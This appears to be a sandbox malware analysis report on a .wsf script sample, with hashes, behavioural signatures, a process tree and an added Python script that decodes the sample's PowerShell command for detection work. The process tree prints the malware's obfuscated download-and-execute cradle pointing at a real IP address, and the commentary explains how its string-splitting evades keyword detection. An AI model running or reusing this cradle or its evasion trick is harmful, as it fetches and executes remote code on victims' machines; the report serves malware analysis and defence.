Analysis

max time kernel: 31s
max time network: 33s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 06-06-2023 14:23
Static task: static1
Behavioral task: behavioral1
  Sample: Adoc-PDFPasswordedaround_V16AEYj.wsf
  Resource: win7-20230220-en (windows7-x64)
  5 signatures
  150 seconds
General

Target: Adoc-PDFPasswordedaround_V16AEYj.wsf
Size: 198KB
MD5: 238ead4420470bac07e1f77e789af46b
SHA1: ed5a3f475ff87fa5ebc994404c83b8d8afea1aec
SHA256: 0024eeff7a3739674fa0c70d7ede07f8b763a795fe05e3908e058cb1d10ac2c3
SHA512: 55326e40fca8c6908b9d939bb628a065e615a490cfc6491e511c797e1f350ddfecc55df0cac6d60d9812aaa1d70c7965444437145dc7d0a3d0855c056a264bbc
SSDEEP: 384:13XU3XU3XU3XU3XU3XU3XU3XU3XU3XU3XU3Xcp3XU3XU3XU3XU3XU3XU3XU3XU3o:y

Score: 8/10
Malware Config
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   process
  3     1392  WScript.exe
  4     1820  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   process
  1820  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  1820  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid   process      target process
  PID 1392 wrote to memory of 1820   1392  WScript.exe  powershell.exe
  PID 1392 wrote to memory of 1820   1392  WScript.exe  powershell.exe
  PID 1392 wrote to memory of 1820   1392  WScript.exe  powershell.exe
Processes

1. C:\Windows\System32\WScript.exe (pid 1392)
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Adoc-PDFPasswordedaround_V16AEYj.wsf"
   - Blocklisted process makes network request
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 1820, child of 1)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s3='IeX(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$HJDRRRUY='kdsa4(''http://195.178.120.137:222/d.jpg'')'.RePLACe('kdsa4','ADSTRING');Sleep 1;IeX($s3+$kds+$HJDRRRUY);
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
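The PowerShell command line recorded for pid 1820 splits a plain WebClient download cradle across three string variables and a Replace() call, so neither "WebClient" nor "DownloadString" appears contiguously in the raw command line and a simple keyword match on process-creation telemetry misses it. The script below is an added example, not part of the sandbox report: it re-executes only the string operations this cradle relies on (single-quoted literals with '' escapes, a .Replace() chain, and + concatenation inside IeX) to rebuild the final command as text, pulls the URL out of it, and shows the raw-versus-decoded difference a detection rule has to account for. The regex names and helper functions are this example's own; the only statement shapes it understands are the ones visible in the command line above, and nothing is downloaded or executed.

```python
import re

# Obfuscated command line recorded in the sandbox process tree for pid 1820
# (copied from the report; this script only rebuilds it as text and never runs it).
CMDLINE = (
    "$s3='IeX(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;"
    "$HJDRRRUY='kdsa4(''http://195.178.120.137:222/d.jpg'')'.RePLACe('kdsa4','ADSTRING');"
    "Sleep 1;IeX($s3+$kds+$HJDRRRUY);"
)

# PowerShell single-quoted literal: no escape sequences, except '' for a literal quote.
SQ = r"'((?:[^']|'')*)'"
# $name='literal' optionally followed by one or more .Replace('old','new') calls.
ASSIGN_RE = re.compile(r"^\$(\w+)=" + SQ + r"((?:\.replace\(" + SQ + "," + SQ + r"\))*)$", re.I)
REPLACE_RE = re.compile(r"\.replace\(" + SQ + "," + SQ + r"\)", re.I)
IEX_RE = re.compile(r"^iex\((.+)\)$", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# The cradle as it looks once the fragments are joined (case-insensitive, as PowerShell is).
CRADLE_RE = re.compile(r"new-object\s+(?:system\.)?net\.webclient\)?\.downloadstring", re.I)


def unquote(body):
    """Runtime value of a single-quoted literal body: '' becomes a single quote."""
    return body.replace("''", "'")


def split_statements(cmd):
    """Split on ';' characters that sit outside single-quoted strings."""
    stmts, cur, in_quote = [], [], False
    for ch in cmd:
        if ch == "'":
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            stmts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    stmts.append("".join(cur).strip())
    return [s for s in stmts if s]


def deobfuscate(cmd):
    """Evaluate only the assignments, their .Replace() chains and the final
    IeX($a+$b+$c) concatenation. Sleep and the stray [BYTe[]] are padding and
    are ignored. Returns the string IeX would have executed."""
    env, result = {}, None
    for stmt in split_statements(cmd):
        m = ASSIGN_RE.match(stmt)
        if m:
            name, value, chain = m.group(1), unquote(m.group(2)), m.group(3)
            for old, new in REPLACE_RE.findall(chain):
                # .NET String.Replace is case-sensitive, so a plain str.replace matches it.
                value = value.replace(unquote(old), unquote(new))
            env[name.lower()] = value  # PowerShell variable names are case-insensitive
            continue
        m = IEX_RE.match(stmt)
        if m:
            parts = [p.strip().lstrip("$").lower() for p in m.group(1).split("+")]
            result = "".join(env[p] for p in parts)
    return result


def extract_urls(text):
    """Network IOCs present in the decoded command."""
    return sorted(set(URL_RE.findall(text)))


def is_download_cradle(text):
    """True when a WebClient.DownloadString cradle is visible in the given text."""
    return CRADLE_RE.search(text) is not None


if __name__ == "__main__":
    decoded = deobfuscate(CMDLINE)
    print("decoded :", decoded)
    print("urls    :", extract_urls(decoded))
    print("cradle visible in raw cmdline?", is_download_cradle(CMDLINE))
    print("cradle visible after decoding?", is_download_cradle(decoded))
```

Running it prints the reconstructed cradle, IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('http://195.178.120.137:222/d.jpg'), and reports that the cradle pattern matches the decoded text but not the raw command line. For detection, that is the argument for alerting on the parent-child pair (WScript.exe spawning powershell.exe with inline -style string concatenation and Replace) or on ScriptBlock logging, which records the string after IeX has assembled it, rather than on keywords in the original command line.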
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/1820-63-0x0000000002950000-0x00000000029D0000-memory.dmp   512KB
memory/1820-62-0x0000000002950000-0x00000000029D0000-memory.dmp   512KB
memory/1820-61-0x000000001B290000-0x000000001B572000-memory.dmp   2.9MB
memory/1820-64-0x00000000022F0000-0x00000000022F8000-memory.dmp   32KB
memory/1820-65-0x0000000002950000-0x00000000029D0000-memory.dmp   512KB
memory/1820-66-0x0000000002950000-0x00000000029D0000-memory.dmp   512KB